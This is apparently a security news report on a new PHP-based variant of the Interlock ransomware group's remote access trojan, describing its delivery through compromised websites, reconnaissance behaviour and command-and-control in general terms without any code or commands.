Researchers from The DFIR Report and Proofpoint have uncovered a new and highly persistent variant of the Interlock ransomware group’s remote access trojan (RAT). Unlike its previous JavaScript-based version known as NodeSnake, the latest variant is written in PHP and is actively being deployed in an extensive campaign observed since May 2025.
The new wave of attacks has been linked to the LandUpdate808 threat cluster, also known as KongTuke. The campaigns begin with the injection of a single-line malicious script into compromised websites, which often goes unnoticed by site owners and visitors alike. The embedded JavaScript employs strict IP filtering and serves a payload that tricks users into completing ‘verification steps’, including running a PowerShell command copied from the clipboard, which triggers the installation of Interlock RAT.
Researchers have identified both PHP and Node.js variants of the malware being used in recent attacks, with the PHP version first surfacing in June 2025. The delivery mechanism for the malware appears to be transitioning to a “FileFix” variant, which has been observed dropping the PHP version and, in some cases, subsequently deploying the original Node.js-based RAT.
Once executed, Interlock RAT performs extensive automated reconnaissance. It gathers a detailed system profile using PowerShell commands to extract data such as system specifications, active processes, services, mounted drives, and network neighbors. The RAT also determines its privilege level (USER, ADMIN, or SYSTEM), allowing attackers to adjust their actions based on system access.
Communication with attacker infrastructure is maintained through Cloudflare Tunnel URLs using the trycloudflare.com domain, masking the command-and-control (C2) server's true location.
Additionally, hardcoded fallback IP addresses provide the malware with a resilient communication channel even if the primary C2 method is disrupted. The threat actor uses Remote Desktop Protocol (RDP) for lateral movement across victim environments.
The campaign appears to be opportunistic and not limited to specific industries, the researchers noted.
